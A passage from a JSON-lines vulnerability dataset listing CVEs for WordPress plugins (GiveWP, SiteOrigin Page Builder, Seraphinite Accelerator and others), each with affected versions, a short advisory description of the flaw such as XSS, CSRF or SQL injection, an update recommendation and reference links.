version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/secupress\\\/trunk\\\/free\\\/common.php#L238\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/secupress\\\/trunk\\\/free\\\/common.php#L238\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/56e842c8-61ac-4281-8c4a-9cb1f8ecc062?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/56e842c8-61ac-4281-8c4a-9cb1f8ecc062?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2706","slug":"mobile-login-woocommerce","versionEndExcluding":"2.3","description":"The OTP Login Woocommerce & Gravity Forms plugin for WordPress is vulnerable to authentication bypass. This is due to the fact that when generating OTP codes for users to use in order to login via phone number, the plugin returns these codes in an AJAX response. This makes it possible for unauthenticated attackers to obtain login codes for administrators. This does require an attacker have access to the phone number configured for an account, which can be obtained via social engineering or reconnaissance.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b1b7b653-496f-467a-9513-4be1891f38ae?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b1b7b653-496f-467a-9513-4be1891f38ae?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2912731%40mobile-login-woocommerce&new=2912731%40mobile-login-woocommerce&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2912731%40mobile-login-woocommerce&new=2912731%40mobile-login-woocommerce&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mobile-login-woocommerce\\\/tags\\\/2.2\\\/includes\\\/class-xoo-ml-verification.php#L362\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mobile-login-woocommerce\\\/tags\\\/2.2\\\/includes\\\/class-xoo-ml-verification.php#L362\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5488","slug":"wp-masonry-infinite-scroll","versionImpact":"2.2","versionEndExcluding":"2.3","description":"The WP Masonry & Infinite Scroll plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wmis' shortcode in all versions up to, and including, 2.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-masonry-infinite-scroll\\\/trunk\\\/includes\\\/functions.php#L227\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-masonry-infinite-scroll\\\/trunk\\\/includes\\\/functions.php#L227\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3314905%40wp-masonry-infinite-scroll&new=3314905%40wp-masonry-infinite-scroll&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3314905%40wp-masonry-infinite-scroll&new=3314905%40wp-masonry-infinite-scroll&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/656c6236-55e6-4989-8f3d-2d2f81ab0093?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/656c6236-55e6-4989-8f3d-2d2f81ab0093?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13743","slug":"wonderplugin-video-embed","versionImpact":"2.2","versionEndExcluding":"2.3","description":"The Wonder Video Embed plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's wonderplugin_video shortcode in all versions up to, and including, 2.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wonderplugin-video-embed\\\/trunk\\\/app\\\/class-wonderplugin-videoembed-widgetview.php#L232\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wonderplugin-video-embed\\\/trunk\\\/app\\\/class-wonderplugin-videoembed-widgetview.php#L232\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/97bd4897-c0c2-4819-aa25-942e256de9a3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/97bd4897-c0c2-4819-aa25-942e256de9a3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-46627","slug":"wp-simple-html-sitemap","versionImpact":"2.2","versionEndExcluding":"2.3","description":"Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in Ashish Ajani WordPress Simple HTML Sitemap plugin <=\u00a02.1 versions.","recommendation":"Update to version 2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-simple-html-sitemap\\\/wordpress-wordpress-simple-html-sitemap-plugin-2-1-cross-site-scripting-xss-vulnerability-2?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-simple-html-sitemap\\\/wordpress-wordpress-simple-html-sitemap-plugin-2-1-cross-site-scripting-xss-vulnerability-2?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12250","slug":"accept-authorize-net-payments-using-contact-form-7","versionImpact":"2.2","versionEndExcluding":"2.3","description":"The Accept Authorize.NET Payments Using Contact Form 7 plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 2.2 via the cf7adn-info.php file. This makes it possible for unauthenticated attackers to extract configuration data which can be used to aid in other attacks.","recommendation":"Update to version 2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3208517%40accept-authorize-net-payments-using-contact-form-7&new=3208517%40accept-authorize-net-payments-using-contact-form-7&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3208517%40accept-authorize-net-payments-using-contact-form-7&new=3208517%40accept-authorize-net-payments-using-contact-form-7&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d8801b9a-afcb-483b-a018-4f68448e96de?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d8801b9a-afcb-483b-a018-4f68448e96de?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2202","slug":"siteorigin-panels","versionImpact":"2.29.6","versionEndExcluding":"2.29.7","description":"The Page Builder by SiteOrigin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the legacy Image widget in all versions up to, and including, 2.29.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.29.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/52116a6f-506f-4eeb-9bcc-19900ef38101?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/52116a6f-506f-4eeb-9bcc-19900ef38101?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/siteorigin-panels\\\/trunk\\\/widgets\\\/widgets.php#L911\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/siteorigin-panels\\\/trunk\\\/widgets\\\/widgets.php#L911\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3053935%40siteorigin-panels&new=3053935%40siteorigin-panels&sfp_email=&sfph_mail=#file31\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3053935%40siteorigin-panels&new=3053935%40siteorigin-panels&sfp_email=&sfph_mail=#file31\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4361","slug":"siteorigin-panels","versionImpact":"2.29.15","versionEndExcluding":"2.29.16","description":"The Page Builder by SiteOrigin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'siteorigin_widget' shortcode in all versions up to, and including, 2.29.15 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.29.16, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a97f72f6-86f7-45dc-908a-292ba735071d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a97f72f6-86f7-45dc-908a-292ba735071d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/siteorigin-panels\\\/trunk\\\/inc\\\/widget-shortcode.php#L40\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/siteorigin-panels\\\/trunk\\\/inc\\\/widget-shortcode.php#L40\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3086025\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3086025\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13515","slug":"image-source-control-isc","versionImpact":"2.28.0","versionEndExcluding":"2.28.1","description":"The Image Source Control Lite \u2013 Show Image Credits and Captions plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'path' parameter in all versions up to, and including, 2.28.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.28.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/webzunft\\\/image-source-control\\\/commit\\\/d1461b886ed2991281c2eb95e98c9b211e737a93\",\"name\":\"https:\\\/\\\/github.com\\\/webzunft\\\/image-source-control\\\/commit\\\/d1461b886ed2991281c2eb95e98c9b211e737a93\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3172639%40image-source-control-isc&new=3172639%40image-source-control-isc&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3172639%40image-source-control-isc&new=3172639%40image-source-control-isc&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3188412%40image-source-control-isc&new=3188412%40image-source-control-isc&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3188412%40image-source-control-isc&new=3188412%40image-source-control-isc&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c4debc89-d5ea-4cf1-8e69-197a75794d0b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c4debc89-d5ea-4cf1-8e69-197a75794d0b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6059","slug":"seraphinite-accelerator","versionImpact":"2.27.21","versionEndExcluding":"2.27.22","description":"The Seraphinite Accelerator plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.27.21. This is due to missing or incorrect nonce validation on the 'OnAdminApi_CacheOpBegin' function. This makes it possible for unauthenticated attackers to perform several administrative actions, including deleting the cache, via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 2.27.22, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seraphinite-accelerator\\\/trunk\\\/main.php#L2259\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seraphinite-accelerator\\\/trunk\\\/main.php#L2259\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3284098\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3284098\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f711c9d0-aa56-4e4c-bbcf-afa9598c3518?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f711c9d0-aa56-4e4c-bbcf-afa9598c3518?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6934","slug":"limit-login-attempts-reloaded","versionImpact":"2.25.26","versionEndExcluding":"2.25.27","description":"The Limit Login Attempts Reloaded plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 2.25.26 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.25.27, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/906049c0-4710-47aa-bf44-cdf29032dc1f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/906049c0-4710-47aa-bf44-cdf29032dc1f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/limit-login-attempts-reloaded\\\/trunk\\\/core\\\/Shortcodes.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/limit-login-attempts-reloaded\\\/trunk\\\/core\\\/Shortcodes.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3012447%40limit-login-attempts-reloaded%2Ftrunk&old=2995934%40limit-login-attempts-reloaded%2Ftrunk&sfp_email=&sfph_mail=#file2\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3012447%40limit-login-attempts-reloaded%2Ftrunk&old=2995934%40limit-login-attempts-reloaded%2Ftrunk&sfp_email=&sfph_mail=#file2\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5525","slug":"limit-login-attempts-reloaded","versionImpact":"2.25.25","versionEndExcluding":"2.25.26","description":"The Limit Login Attempts Reloaded WordPress plugin before 2.25.26 is missing authorization on the `toggle_auto_update` AJAX action, allowing any user with a valid nonce to toggle the auto-update status of the plugin.","recommendation":"Update to version 2.25.26, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/654bad15-1c88-446a-b28b-5a412cc0399d\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/654bad15-1c88-446a-b28b-5a412cc0399d\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-37941","slug":"internal-links","versionImpact":"2.24.3","versionEndExcluding":"2.24.4","description":"Cross-Site Request Forgery (CSRF) vulnerability in Internal Link Juicer Internal Link Juicer: SEO Auto Linker for WordPress.This issue affects Internal Link Juicer: SEO Auto Linker for WordPress: from n\/a through 2.24.3.","recommendation":"Update to version 2.24.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/internal-links\\\/wordpress-internal-link-juicer-seo-auto-linker-for-wordpress-plugin-2-24-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/internal-links\\\/wordpress-internal-link-juicer-seo-auto-linker-for-wordpress-plugin-2-24-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5559","slug":"tenweb-speed-optimizer","versionImpact":"2.24.14","versionEndExcluding":"2.24.18","description":"The 10Web Booster WordPress plugin before 2.24.18 does not validate the option name given to some AJAX actions, allowing unauthenticated users to delete arbitrary options from the database, leading to denial of service.","recommendation":"Update to version 2.24.18, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/eba46f7d-e4db-400c-8032-015f21087bbf\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/eba46f7d-e4db-400c-8032-015f21087bbf\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4448","slug":"give","versionEndExcluding":"2.24.0","description":"The GiveWP WordPress plugin before 2.24.0 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ce467a2e-081e-4a6c-bfa4-29e4447ebd3b\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ce467a2e-081e-4a6c-bfa4-29e4447ebd3b\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0224","slug":"give","versionImpact":"2.23.2","versionEndExcluding":"2.24","description":"The GiveWP WordPress plugin before 2.24.1 does not properly escape user input before it reaches SQL queries, which could let unauthenticated attackers perform SQL Injection attacks","recommendation":"Update to version 2.24, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d8da539d-0a1b-46ef-b48d-710c59cf68e1\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d8da539d-0a1b-46ef-b48d-710c59cf68e1\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/givewp.com\\\/core-2-24-0-vulnerability-patched\\\/\",\"name\":\"https:\\\/\\\/givewp.com\\\/core-2-24-0-vulnerability-patched\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0657","slug":"internal-links","versionImpact":"2.23.4","versionEndExcluding":"2.23.5","description":"The Internal Link Juicer: SEO Auto Linker for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings such as 'ilj_settings_field_links_per_page'  in all versions up to, and including, 2.23.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 2.23.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/41d39fe4-b114-4612-92f6-75d6597610f7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/41d39fe4-b114-4612-92f6-75d6597610f7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3033238%40internal-links&new=3033238%40internal-links&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3033238%40internal-links&new=3033238%40internal-links&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7269","slug":"artplacer-widget","versionImpact":"2.21.1","versionEndExcluding":"2.21.2","description":"The ArtPlacer Widget WordPress plugin before 2.21.2 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack","recommendation":"Update to version 2.21.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1e8e1186-323b-473b-a0c4-580dc94020d7\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1e8e1186-323b-473b-a0c4-580dc94020d7\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7268","slug":"artplacer-widget","versionImpact":"2.21.1","versionEndExcluding":"2.21.2","description":"The ArtPlacer Widget WordPress plugin before 2.21.2 does not have an authorisation check in place when deleting widgets, allowing any authenticated user, such as a subscriber, to delete arbitrary widgets","recommendation":"Update to version 2.21.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9ac233dd-e00d-4aee-a41c-0de6e8aaefd7\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9ac233dd-e00d-4aee-a41c-0de6e8aaefd7\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8800","slug":"rabbit-loader","versionImpact":"2.21.0","versionEndExcluding":"2.21.1","description":"The RabbitLoader \u2013 Website Speed Optimization for improving Core Web Vital metrics with Cache, Image Optimization, and more plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.21.0. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.21.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ba435b26-a6f1-41cf-acb8-fffd8a18fea7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ba435b26-a6f1-41cf-acb8-fffd8a18fea7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rabbit-loader\\\/tags\\\/2.21.0\\\/inc\\\/tab_init.php#L86\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rabbit-loader\\\/tags\\\/2.21.0\\\/inc\\\/tab_init.php#L86\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3160267\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3160267\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8756","slug":"quform","versionImpact":"2.20.0","versionEndExcluding":"2.21.0","description":"The Quform - WordPress Form Builder plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.20.0 via the 'saveUploadedFile' function. This makes it possible for unauthenticated attackers to extract sensitive data, such as Personally Identifiable Information, from files uploaded by users. Files uploaded via forms created before version 2.21.0 will remain vulnerable to exposure after upgrading. To fully patch the plugin, site administrators should download any previously uploaded files, delete previously existing files and forms, and create the forms again after upgrading to version 2.21.0.","recommendation":"Update to version 2.21.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/beb8ea66-3cd7-452f-9e64-8439de0ddc55?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/beb8ea66-3cd7-452f-9e64-8439de0ddc55?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/quform-wordpress-form-builder\\\/706149\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/quform-wordpress-form-builder\\\/706149\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6373","slug":"artplacer-widget","versionImpact":"2.20.6","versionEndExcluding":"2.20.7","description":"The ArtPlacer Widget WordPress plugin before 2.20.7 does not sanitize and escape the \"id\" parameter before submitting the query, leading to a SQLI exploitable by editors and above. Note: Due to the lack of CSRF check, the issue could also be exploited via a CSRF against a logged editor (or above)","recommendation":"Update to version 2.20.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/afc11c92-a7c5-4e55-8f34-f2235438bd1b\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/afc11c92-a7c5-4e55-8f34-f2235438bd1b\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5611","slug":"seraphinite-accelerator","versionImpact":"2.20.31","versionEndExcluding":"2.20.32","description":"The Seraphinite Accelerator WordPress plugin before 2.20.32 does not have authorisation and CSRF checks when resetting and importing its settings, allowing unauthenticated users to reset them","recommendation":"Update to version 2.20.32, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8cb8a5e9-2ab6-4d9b-9ffc-ef530e346f8d\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8cb8a5e9-2ab6-4d9b-9ffc-ef530e346f8d\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5610","slug":"seraphinite-accelerator","versionImpact":"2.20.28","versionEndExcluding":"2.20.29","description":"The Seraphinite Accelerator WordPress plugin before 2.2.29 does not validate the URL to redirect any authenticated user to, leading to an arbitrary redirect","recommendation":"Update to version 2.20.29, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e880a9fb-b089-4f98-9781-7d946f22777e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e880a9fb-b089-4f98-9781-7d946f22777e\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5609","slug":"seraphinite-accelerator","versionImpact":"2.20.28","versionEndExcluding":"2.20.29","description":"The Seraphinite Accelerator WordPress plugin before 2.2.29 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"Update to version 2.20.29, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/aac4bcc8-b826-4165-aed3-f422dd178692\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/aac4bcc8-b826-4165-aed3-f422dd178692\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5703","slug":"gift-up","versionImpact":"2.20.1","versionEndExcluding":"2.20.2","description":"The Gift Up Gift Cards for WordPress and WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'giftup' shortcode in all versions up to, and including, 2.20.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.20.2, or a newer patched 